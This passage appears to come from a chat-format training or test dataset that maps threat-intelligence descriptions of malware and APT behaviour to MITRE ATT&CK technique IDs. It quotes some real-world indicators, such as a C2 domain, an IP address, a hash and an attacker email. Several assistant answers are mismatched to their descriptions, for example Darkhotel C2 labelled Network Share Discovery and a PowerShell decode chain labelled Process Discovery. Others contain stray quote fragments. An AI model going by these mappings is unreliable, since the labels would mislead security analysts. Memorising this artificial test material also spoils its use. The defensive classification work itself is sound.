}, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LockBit 2.0 has been seen utilizing numerous tools to dump passwords from password stores and Chrome using GrabChrome and GrabRFF." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores', 'T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity: MD5 0beb957923df2c885d29a9c1743dd94b accounts.serveftp.com 59.188.0.197 BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several tools used by Suckfly have been command-line driven." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system." }, { "role": "assistant", "content": "T1564.005 - Hidden File System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has the ability to identify Workgroup membership." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor appears to support network communication over ports 80 (HTTP) and 443(HTTPS). In recent samples, a certificate is issued from the infected host for communication over HTTPS" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Orz can execute shell commands. Orz can execute commands with JavaScript." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae can download files from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ABK has the ability to use HTTP in communications with C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth uses JavaScript to perform its core functionalities." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT can identify remote hosts on connected networks." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection. Figure 5 shows the commands used to perform these activities on a RAR archive renamed with a *.jpg extension" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InnaputRAT enumerates directories and obtains file attributes on a system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to index and compress files into a send queue for exfiltration." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share." }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages" }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can inject its code into a trusted process via the APC queue." }, { "role": "assistant", "content": "T1055.004 - Process Injection: Asynchronous Procedure Call" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes additional Jscript and VBScript code on the victim's machine." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In March, we came across an email with a malware attachment that used the Gamaredon group’s tactics." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used a file injector DLL to spawn a benign process on the victim's system and inject the malicious payload into it via process hollowing." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has used obfuscated VBA string expressions." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In my previous blog, I noted that a variant of the Cerber downloader was seen using BITS for a brief period of time and 10 out of these 11 samples were Microsoft Word documents leading to Cerber." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can check system time to help determine when changes were made to specified files." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "it operates over DNS traffic, but can also switch to encrypted channels such as HTTPS or SSL" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macros are also responsible for achieving reboot persistence for the ObliqueRAT payloads. This is done by creating a shortcut (.url file extension) in the infected user's Startup directory. Malicious shortcut in the infected user's startup directory to execute ObliqueRAT on startup" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The information this malware collected included the following:The computer nameThe usernameThe execution path of the sampleThe BIOS modelA randomly-generated ID to uniquely identify the systemGroup123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can perform process injection by using a reflective DLL." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda has a command to delete a file. It also can uninstall scripts and delete files to cover its track." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "China Chopper's client component is packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY." }, { "role": "assistant", "content": "T1218 - Signed Binary Proxy Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A file stealer transfers collected files to a hardcoded C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decrypting itself in memory, downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can scan local network for open SMB." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has bypassed UAC." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All this information is stored in the C:\\Users\\Public\\Videos\\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message’s Subject: set to the id" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The WhiteBear binary loader maintains several features including two injection methods for its (oddly named) “KernelInjector” subsystem, also named by its developer – Standart – WindowInject (includes an unusual technique for remotely placing code into memory for subsequent thread execution" }, { "role": "assistant", "content": "T1055.003 - Thread Execution Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Newer variants of will encode C2 communications with a custom system." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WIRTE has used PowerShell for script execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used pass the hash for authentication to remote access software used in C2." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has embedded binaries within RC4 encrypted .png files." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop has searched folders and subfolders for files to encrypt." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes shellcode and a script to decode Base64 strings." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel used a virus that propagates by infecting executables stored on shared drives." }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak can create a Windows account." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group persistence mechanisms have used \"forfiles.exe\" to execute .htm files." }, { "role": "assistant", "content": "T1202 - Indirect Command Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to enumerate processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can harvest clipboard data on both Windows and macOS systems." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 2: Process chain for the first part of the campaign Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SodaMaster can use RC4 to encrypt C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot’s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\[3 characters]\\[1 character]. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry Run and execute ordinal #1 of the DLL" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has the ability to enumerate domain admin accounts." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobian RAT has a feature to perform voice recording on the victim’s machine." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TinyTurla has been installed using a .bat file." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has downloaded a zip file for execution on the system." }, { "role": "assistant", "content": "T1102.003 - One-Way Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "opens a remote shell to execute commands on the infected system." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can check if a specific process is running, such as Kaspersky's `avp.exe`." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a custom version of the RC4 algorithm that includes a programming error." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linfo creates a backdoor through which remote attackers can start a remote shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can explore files on a compromised system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer can download remote files and additional payloads to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "automatically searches for files on local drives based on a predefined list of file extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals files based on an extension list if a USB drive is connected to the system." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: + + “?alt=media” The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected" }, { "role": "assistant", "content": "T1074 - Data Staged', 'T1041 